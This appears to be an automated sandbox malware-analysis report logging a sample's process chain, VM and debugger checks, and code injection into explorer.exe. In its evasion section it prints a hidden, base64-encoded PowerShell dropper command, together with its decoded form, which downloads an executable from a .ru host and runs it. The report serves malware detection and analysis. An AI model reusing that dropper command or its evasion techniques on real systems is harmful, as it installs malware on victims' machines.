      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tesubbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tesubbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tesubbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tesubbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tesubbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tesubbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tesubbaEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_15-4110
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_12-4078
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeAPI/Special instruction interceptor: Address: 7FFB2CECE814
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeAPI/Special instruction interceptor: Address: 7FFB2CECD584
      Source: C:\Users\user\AppData\Roaming\tesubbaAPI/Special instruction interceptor: Address: 7FFB2CECE814
      Source: C:\Users\user\AppData\Roaming\tesubbaAPI/Special instruction interceptor: Address: 7FFB2CECD584
      Source: oBuf.exe, 0000000C.00000002.1426399124.00000000008CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5400Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4461Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 408Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 398Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 885Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 820Thread sleep count: 5400 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 820Thread sleep count: 4461 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4716Thread sleep time: -15679732462653109s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 7292Thread sleep count: 408 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7448Thread sleep count: 398 > 30Jump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_00418A70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418CA4h12_2_00418A70
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_00418A70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418CA4h15_2_00418A70
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: explorer.exe, 0000000E.00000000.1404942216.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
      Source: explorer.exe, 0000000E.00000000.1411786366.000000000C4A2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 0000000E.00000000.1405542663.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
      Source: explorer.exe, 0000000E.00000002.2501943788.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: powershell.exe, 00000004.00000002.1352697535.00000194F5C57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: explorer.exe, 0000000E.00000003.2271814403.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1408331897.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2501943788.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 0000000E.00000000.1405542663.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
      Source: explorer.exe, 0000000E.00000000.1411786366.000000000C4A2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}W
      Source: explorer.exe, 0000000E.00000000.1408331897.0000000009013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 0000000E.00000000.1405542663.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
      Source: explorer.exe, 0000000E.00000000.1405542663.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
      Source: explorer.exe, 0000000E.00000000.1406417153.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_xU1
      Source: powershell.exe, 00000004.00000002.1352697535.00000194F5C10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: explorer.exe, 0000000E.00000002.2501943788.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
      Source: explorer.exe, 0000000E.00000000.1411786366.000000000C4A2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}g
      Source: explorer.exe, 0000000E.00000002.2501943788.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
      Source: explorer.exe, 0000000E.00000000.1408331897.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
      Source: explorer.exe, 0000000E.00000002.2501943788.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 0000000E.00000000.1408331897.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271814403.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2501943788.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
      Source: explorer.exe, 0000000E.00000000.1405542663.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
      Source: explorer.exe, 0000000E.00000000.1405542663.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
      Source: explorer.exe, 0000000E.00000002.2501943788.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
      Source: explorer.exe, 0000000E.00000000.1408331897.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
      Source: explorer.exe, 0000000E.00000000.1406417153.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: explorer.exe, 0000000E.00000002.2501943788.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271814403.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1408331897.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
      Source: explorer.exe, 0000000E.00000000.1411786366.000000000C4A2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8
      Source: explorer.exe, 0000000E.00000000.1405542663.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
      Source: explorer.exe, 0000000E.00000000.1405542663.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
      Source: explorer.exe, 0000000E.00000000.1404942216.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 0000000E.00000000.1405542663.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
      Source: explorer.exe, 0000000E.00000002.2501943788.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 0000000E.00000000.1404942216.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\tesubbaSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\tesubbaDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_15-4110
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_12-4078
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\tesubbaProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_006A092B mov eax, dword ptr fs:[00000030h]12_2_006A092B
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_006A0D90 mov eax, dword ptr fs:[00000030h]12_2_006A0D90
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_008E0DDC push dword ptr fs:[00000030h]12_2_008E0DDC
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_005A092B mov eax, dword ptr fs:[00000030h]15_2_005A092B
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_005A0D90 mov eax, dword ptr fs:[00000030h]15_2_005A0D90
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_005CFD9C push dword ptr fs:[00000030h]15_2_005CFD9C

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeFile created: tesubba.14.drJump to dropped file
      Source: C:\Windows\explorer.exeNetwork Connect: 188.40.141.211 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 193.46.217.78 80Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeThread created: C:\Windows\explorer.exe EIP: AC419F0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\tesubbaThread created: unknown EIP: 83819F0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $path = $Env:temp+'\oBuf.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://bestmagazineforanimalsunicum.ru/download/svc.exe',$path); Start-Process -FilePath $path
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $path = $Env:temp+'\oBuf.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://bestmagazineforanimalsunicum.ru/download/svc.exe',$path); Start-Process -FilePath $pathJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\tesubbaSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\tesubbaSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\oBuf.exe "C:\Users\user~1\AppData\Local\Temp\oBuf.exe" Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -enc jabwageadaboacaapqagacqarqbuahyaogb0aguabqbwacsajwbcag8aqgb1agyalgblahgazqanadsaiaakagmababpaguabgb0acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqaowagacqaywbsagkazqbuahqalgbkag8adwbuagwabwbhagqazgbpagwazqaoaccaaab0ahqacaa6ac8alwbiaguacwb0ag0ayqbnageaegbpag4azqbmag8acgbhag4aaqbtageababzahuabgbpagmadqbtac4acgb1ac8azabvahcabgbsag8ayqbkac8acwb2agmalgblahgazqanacwajabwageadaboackaowagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagacqacabhahqaaaa=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -ep bypass -enc jabwageadaboacaapqagacqarqbuahyaogb0aguabqbwacsajwbcag8aqgb1agyalgblahgazqanadsaiaakagmababpaguabgb0acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqaowagacqaywbsagkazqbuahqalgbkag8adwbuagwabwbhagqazgbpagwazqaoaccaaab0ahqacaa6ac8alwbiaguacwb0ag0ayqbnageaegbpag4azqbmag8acgbhag4aaqbtageababzahuabgbpagmadqbtac4acgb1ac8azabvahcabgbsag8ayqbkac8acwb2agmalgblahgazqanacwajabwageadaboackaowagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagacqacabhahqaaaa=
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -enc jabwageadaboacaapqagacqarqbuahyaogb0aguabqbwacsajwbcag8aqgb1agyalgblahgazqanadsaiaakagmababpaguabgb0acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqaowagacqaywbsagkazqbuahqalgbkag8adwbuagwabwbhagqazgbpagwazqaoaccaaab0ahqacaa6ac8alwbiaguacwb0ag0ayqbnageaegbpag4azqbmag8acgbhag4aaqbtageababzahuabgbpagmadqbtac4acgb1ac8azabvahcabgbsag8ayqbkac8acwb2agmalgblahgazqanacwajabwageadaboackaowagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagacqacabhahqaaaa=Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -ep bypass -enc jabwageadaboacaapqagacqarqbuahyaogb0aguabqbwacsajwbcag8aqgb1agyalgblahgazqanadsaiaakagmababpaguabgb0acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqaowagacqaywbsagkazqbuahqalgbkag8adwbuagwabwbhagqazgbpagwazqaoaccaaab0ahqacaa6ac8alwbiaguacwb0ag0ayqbnageaegbpag4azqbmag8acgbhag4aaqbtageababzahuabgbpagmadqbtac4acgb1ac8azabvahcabgbsag8ayqbkac8acwb2agmalgblahgazqanacwajabwageadaboackaowagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagacqacabhahqaaaa=Jump to behavior
      Source: explorer.exe, 0000000E.00000002.2501943788.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1405260216.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.2497232140.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 0000000E.00000000.1405260216.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.2497232140.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 0000000E.00000000.1405260216.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.2497232140.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
      Source: explorer.exe, 0000000E.00000000.1404942216.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2494612867.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
      Source: explorer.exe, 0000000E.00000000.1405260216.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.2497232140.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
